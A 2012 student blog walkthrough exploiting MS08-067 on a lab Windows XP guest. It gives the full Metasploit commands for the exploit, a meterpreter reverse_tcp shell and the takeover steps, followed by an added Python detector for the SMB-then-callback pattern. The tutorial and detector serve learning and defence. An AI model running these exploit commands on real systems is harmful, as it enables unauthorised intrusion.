Saturday, January 28, 2012

Metasploit on Backtrack 5

Now I'll try to use the Metasploit console to exploit Windows XP SP3 on VirtualBox. First we need information about the victim; in penetration testing this is known as Information Gathering. We can use nmap, Zenmap, etc. to scan for candidate victims on the network.

Scanning Network
We can see which hosts are active on the network; the target has IP 192.168.56.102. After getting the IP we need to scan the target for vulnerabilities; here I use Nessus.
After opening Nessus, fill in the Name, Target and Policy, and fill Scan Target with the victim's IP.
Press scan and wait until the results are finished.
We can see the victim has 2 high-risk vulnerabilities; click on port 445 and look at the detailed information like this.
I looked at the 2 vulnerabilities and chose the 2nd plugin; I tried to exploit the first option and the exploitation failed, so I chose the 2nd option, which is this.
The plugin name is MS08-067. I searched for information about that plugin's vulnerability on Google and found it in the Metasploit payload description, and tried to exploit it. Next, open the Metasploit console with this command in the terminal:
# msfconsole
Use the exploit matching the Nessus result; the syntax in Metasploit is
use exploit/windows/smb/ms08_067_netapi
After choosing the exploit we need to set the payload with the syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After setting the payload we need to specify the local host and the target with the syntax
set LHOST 192.168.56.1    << my IP
set RHOST 192.168.56.102  << target IP
and run the exploit with the syntax
exploit
which puts us into meterpreter mode.
 
Once we are in meterpreter mode it means we have made a hole into the target system with the payload we used; now we need to get into C:\ (system32) on the system to fully take down the target.
Use the syntax
 
meterpreter > execute -M -f cmd.exe
This command makes the system execute a command prompt on the target (XP), and after that we are in the target's system32.
To prove we have taken over the system, create a folder in C:\.
Use the command mkdir is2c at the C:\> prompt to make a folder in C:\.
We succeeded in making the folder in C:\, which means we have taken over the XP system.
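The sequence above leaves a recognisable trace on the defender's side: an inbound SMB connection on port 445 to the victim, followed within seconds by the victim opening a connection back to the same peer on an unusual port (the reverse_tcp handler). As an added example that is not part of the original post, the following Python flags that pattern in constructed flow-log lines; the addresses are the post's lab IPs, and the callback port 4444 is an assumption (Metasploit's default LPORT).

```python
"""Flag the trace left by the walkthrough above on the defender's side: an
inbound SMB connection (port 445) to a host, followed shortly by that host
connecting back to the same peer on an unusual port (the reverse_tcp handler).
Flows are constructed; addresses are the post's lab IPs, port 4444 is an
assumption (Metasploit's default LPORT)."""
from datetime import datetime, timedelta

# Ports a host may legitimately talk to right after serving SMB; others are reported.
BENIGN_OUTBOUND_PORTS = {53, 80, 443, 445}


def parse_flow(line):
    """Parse one constructed flow line '<ISO time> <src> -> <dst>:<dport>'
    into a (timestamp, src, dst, dport) tuple."""
    ts, src, _arrow, dst_port = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port)


def find_reverse_callbacks(lines, window=timedelta(seconds=60), smb_port=445):
    """Return sorted (victim, attacker, callback_port) triples: `victim`
    accepted SMB from `attacker`, then connected back to `attacker` within
    `window` on a port outside BENIGN_OUTBOUND_PORTS."""
    flows = sorted(parse_flow(line) for line in lines)
    hits = set()
    for smb_ts, attacker, victim, _ in (f for f in flows if f[3] == smb_port):
        for ts, src, dst, dport in flows:
            reversed_pair = src == victim and dst == attacker
            in_window = smb_ts <= ts <= smb_ts + window
            if reversed_pair and in_window and dport not in BENIGN_OUTBOUND_PORTS:
                hits.add((victim, attacker, dport))
    return sorted(hits)


# Constructed sample: the exploit attempt and its callback, a benign DNS query,
# and an unrelated SMB connection from another host that never calls back.
SAMPLE_FLOWS = [
    "2012-01-28T10:00:00 192.168.56.1 -> 192.168.56.102:445",
    "2012-01-28T10:00:02 192.168.56.102 -> 192.168.56.1:4444",
    "2012-01-28T10:00:05 192.168.56.102 -> 192.168.56.1:53",
    "2012-01-28T10:05:00 192.168.56.103 -> 192.168.56.102:445",
]

if __name__ == "__main__":
    for victim, attacker, port in find_reverse_callbacks(SAMPLE_FLOWS):
        print(f"{victim} called back to {attacker}:{port} after inbound SMB")
```

On a real network the same check would run over firewall or NetFlow exports; blocking or alerting on this pair of events catches the callback regardless of which SMB exploit was used.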

IS2C © 2012 Blog's Student | is2c